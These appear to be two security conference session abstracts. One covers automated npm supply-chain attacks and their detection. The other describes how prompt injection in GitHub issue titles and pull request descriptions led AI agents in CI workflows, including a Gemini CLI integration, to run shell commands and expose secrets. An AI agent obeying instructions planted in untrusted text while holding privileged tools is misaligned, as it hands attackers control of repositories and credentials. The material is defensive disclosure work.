Supply chain attacks have evolved. What were once isolated package compromises are now automated campaigns that scale through CI pipelines, registries, and stolen tokens.

Over the past year, we uncovered several major incidents that reveal this shift. We exposed the Shai-Hulud self propagating npm worm, which used stolen maintainer tokens to republish across packages. We identified the largest known mass compromise of npm packages involving debug and chalk, impacting billions of weekly downloads. We also uncovered the backdooring of the official XRP cryptocurrency SDK inside a trusted registry.

Across these investigations, a repeatable pattern emerged:

• Token theft replaces package compromise as the primary objective
• CI automation becomes a lateral movement engine
• Registry trust amplifies small footholds into ecosystem-wide incidents
• AI tooling reduces the cost and speed of generating and refining malware

AI is not only accelerating attackers. It also enabled detection. By analyzing publishing behavior and dependency anomalies at scale, we identified propagation patterns traditional scanners missed.

This session breaks down how these attacks work and what engineers must redesign: limiting token blast radius, hardening CI workflows, strengthening registry controls, and using AI-assisted detection to counter automated threats.

Supply chain security now moves at machine speed. Defense must too.

AI agents are rapidly being embedded into CI/CD pipelines to triage issues, review pull requests, and automate development workflows. When those agents run with repository write access, shell execution, and privileged tokens, a new attack surface emerges.

Our team uncovered a vulnerability pattern in real-world GitHub Actions workflows, including Google’s Gemini CLI integration, where prompt injection allowed untrusted input to influence privileged automation. By embedding malicious instructions inside issue titles or pull request descriptions, attackers could trigger shell commands, access secrets, and manipulate repository state through the AI agent itself.

This exposed a structural flaw in how AI agents are integrated into CI systems. When untrusted text is combined with high-privilege tooling, the agent effectively becomes a command interpreter.

In this session, we break down:

• How prompt injection leads to tool invocation inside CI
• Why AI agents amplify trust boundary mistakes
• The full exploitation chain from issue text to shell access
• Architectural controls to prevent similar failures

We conclude with practical engineering guidance: isolating privileges, constraining tool access, separating trust boundaries, and designing CI systems that remain secure even with embedded AI.

AI is becoming part of build infrastructure. Security architecture must evolve with it.